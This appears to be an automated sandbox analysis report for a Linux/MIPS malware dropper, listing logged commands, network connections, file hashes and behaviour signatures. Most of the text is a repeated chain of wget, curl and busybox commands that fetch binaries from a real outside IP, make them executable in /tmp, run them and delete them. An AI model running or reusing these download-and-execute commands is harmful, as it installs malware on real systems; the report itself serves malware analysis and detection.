[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/chmod
[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO
[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/rm
[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/wget
[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/chmod
[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV
[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/rm
[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/wget
[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/chmod
[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi
[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/rm
[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/wget
[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/chmod
[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM
[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/rm
[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/wget
[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/chmod
[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV
[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/rm
[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/wget
[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/chmod
[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi
[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/rm
[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/wget
[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/chmod
[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM
[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/rm
[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/wget
[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/chmod
[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO
[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/rm
[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/wget
[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/chmod
[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/rm
[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/wget
[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/chmod
[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e
[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/rm
[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/wget
[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/chmod
[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc
[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/rm
[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/wget
[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/chmod
[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ
[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/rm
[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/chmod
[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy
[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/rm
[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/wget
[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/chmod
[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH
[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/rm
[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/wget
[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/chmod
[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3
[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/rm
[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/wget
[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/chmod
[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk
[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/rm
[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/wget
[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/chmod
[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc
[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/rm
[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/wget
[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/chmod
[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx
[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/rm
[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/836-1-0xb66a5000-0xb66b6044-memory.dmp
memory/841-2-0xb66e9000-0xb66fa044-memory.dmp
memory/842-3-0xb66f4000-0xb6705044-memory.dmp
memory/885-4-0xb6726000-0xb6737044-memory.dmp
memory/909-5-0xb6780000-0xb6791044-memory.dmp
memory/921-6-0xb66b6000-0xb66c7044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 01:00
Reported
2024-11-21 01:02
Platform
debian9-mipsbe-20240611-en
Max time kernel
71s
Max time network
74s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | N/A |
| N/A | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | N/A |
| N/A | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | N/A |
| N/A | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | N/A |
| N/A | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | N/A |
| N/A | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | N/A |
| N/A | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | N/A |
| N/A | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | N/A |
| N/A | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | N/A |
| N/A | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | N/A |
| N/A | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | N/A |
| N/A | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | N/A |
| N/A | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | N/A |
| N/A | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | N/A |
| N/A | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | N/A |
| N/A | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | N/A |
| N/A | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | N/A |
| N/A | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | N/A |
| N/A | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | N/A |
| N/A | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | N/A |
| N/A | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | N/A |
| N/A | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | N/A |
| N/A | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | N/A |
| N/A | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | N/A |
| N/A | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | N/A |
| N/A | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | N/A |
| N/A | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | N/A |
| N/A | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /usr/bin/curl | N/A |
